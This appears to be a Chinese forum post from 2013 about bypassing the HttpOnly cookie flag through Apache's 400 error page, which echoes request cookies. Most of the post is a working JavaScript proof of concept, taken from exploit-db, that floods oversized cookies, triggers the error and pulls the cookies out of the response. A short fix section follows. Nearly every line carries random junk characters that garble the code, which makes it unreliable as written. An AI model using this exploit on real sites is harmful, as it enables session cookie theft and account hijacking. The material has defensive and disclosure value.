很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
+ K% r' R3 ^8 j2 I' X; D3 P9 n1 W; V( `. u$ ?: U
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
( t/ |* {' ? R: e1 E
/ g5 J5 z# J: ^! W% l A7 u* M4 c: c* m' l
// http://www.exploit-db.com/exploits/18442/
A, @2 C) m9 |- Dfunction setCookies (good) {/ G9 O f d5 @3 d- B( g7 _
// Construct string for cookie value$ q% `! B9 O, I* |3 [7 G! f9 s
var str = "";$ y+ ^9 b0 i+ I* V: B
for (var i=0; i< 819; i++) {9 c( L0 P3 A0 x( l
str += "x";9 b+ A `) q: \) B! G, f
}' X2 M+ W# s& l, N! r& ^
// Set cookies$ G/ p8 ^. n9 A& H$ @
for (i = 0; i < 10; i++) {
0 W0 N |; Z; H5 g3 B// Expire evil cookie
$ y" [) d8 W; J) T, qif (good) {
' ]) s, \; d; Gvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
( p/ n7 v' G, |3 U}4 W/ d9 U* P0 ]) r$ ^
// Set evil cookie( _/ t6 D- o% c) ~& C. Y, r9 _7 p
else {
! D; f) h( ^, K8 D) f% e- Evar cookie = "xss"+i+"="+str+";path=/";
7 W9 _4 R# Z" V" q}6 ?* V( X& K A2 g
document.cookie = cookie;
9 V$ s% q$ R' T' E, _}9 [$ d1 P+ H; R T g: Q
}. x# ]8 \* |& G! x, t( x
function makeRequest() {
" `& {/ z' T$ a) G) m. ?; N: _9 isetCookies();5 x E" C+ f- O" t0 x8 V ^
function parseCookies () {
u3 _, d) s8 N" A9 r. Jvar cookie_dict = {};) q, i* g0 ?# N# C2 {) Z# I
// Only react on 400 status
9 X9 H. U; j. h! {6 Vif (xhr.readyState === 4 && xhr.status === 400) {3 c/ y8 o1 m; \. k
// Replace newlines and match <pre> content: d3 X: d1 p. q0 C6 p5 b+ r
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
l" x9 j: n* o8 U+ f. N& fif (content.length) {5 x5 T/ z# d6 S8 s
// Remove Cookie: prefix" B, s% h; l* m" L
content = content[1].replace("Cookie: ", "");
& ?8 y" S0 j+ J9 N+ e9 d. Xvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
) `& e$ n4 S: t1 Z/ Z- K$ H// Add cookies to object
9 ~6 V* _% O2 e) N/ m4 [: Q }for (var i=0; i<cookies.length; i++) {
% M3 J& S/ {$ ~2 _+ k( Bvar s_c = cookies.split('=',2);7 I7 A2 V, V3 }
cookie_dict[s_c[0]] = s_c[1];
* y$ ~. w+ X( b0 _, R) v}5 ]& P' Y) g* C* Q0 K4 ]
}
6 q+ @6 V5 L; l& |// Unset malicious cookies2 _& y2 c$ Q5 r$ k- Q5 j1 T: c
setCookies(true);3 @3 n6 |' s+ `" h5 x, Y
alert(JSON.stringify(cookie_dict));1 _4 m Z& L7 q0 Q
}! V$ [: }. w* V, m4 C( s
}
2 S: A" D, c/ c+ b) d// Make XHR request
9 e* i/ a4 D) ^0 jvar xhr = new XMLHttpRequest();
$ _4 P8 M& a7 _/ y1 e* Pxhr.onreadystatechange = parseCookies;: l4 j7 x/ a, I
xhr.open("GET", "/", true);
: i* ~6 z3 L' N7 q4 P2 ~! fxhr.send(null);
' k3 w8 ?$ c& V7 z7 h$ C}/ C9 d/ Z: ]* N8 v
makeRequest();$ C% r9 A' i; {
. @1 Q$ | m6 x f* @8 \) s/ n `
你就能看见华丽丽的400错误包含着cookie信息。; D& U( K# E9 j
! |4 I/ s/ c1 ^下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
/ c- N2 u7 e d* Z0 m6 I
! _# H, o1 q {$ e& U1 c修复方案:
8 I S# z% C2 l1 M, h3 J3 i. G9 v. b
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
8 R( l4 K9 f w1 u/ _4 J( m
9 ~* n5 X5 J4 K7 f! u7 nIn the event of a problem or error, Apachecan be configured to do one of four things,
$ `2 L* v8 }8 u' s" y
! K% D% r. [$ K' M Z7 \) }: F/ j1. output asimple hardcoded error message输出一个简单生硬的错误代码信息6 a! E0 _: W* z6 Z
2. output acustomized message输出一段信息
& a1 Q5 z6 f& I3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 * p9 Y4 u! d7 V O( D7 S5 w
4. redirect to an external URL to handle theproblem/error转向一个外部URL
8 `* Q6 R4 H6 Z1 J, ^$ ^, A
1 v' w" ? G9 V0 l4 d3 f经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
$ E- E0 ?# @( j: O! E' O; V! I S$ D6 r& C$ `" }0 ?" K1 C6 _
Apache配置:& M7 x) I* |/ ?4 H/ z' P; d
2 t7 a$ E: V- ~& I; CErrorDocument400 " security test" y. \7 Q0 g& i* Q4 P9 X N) k7 u8 c8 H
, N" m u4 b: B
当然,升级apache到最新也可:)。* V) O' x% f2 N$ u7 C
! B& e# T# N( ^" @ l参考:http://httpd.apache.org/security/vulnerabilities_22.html
) T3 o& C6 \5 a6 R2 d8 B0 V7 E* B
|
发表于 2013-4-19 19:15:43
收藏
支持
反对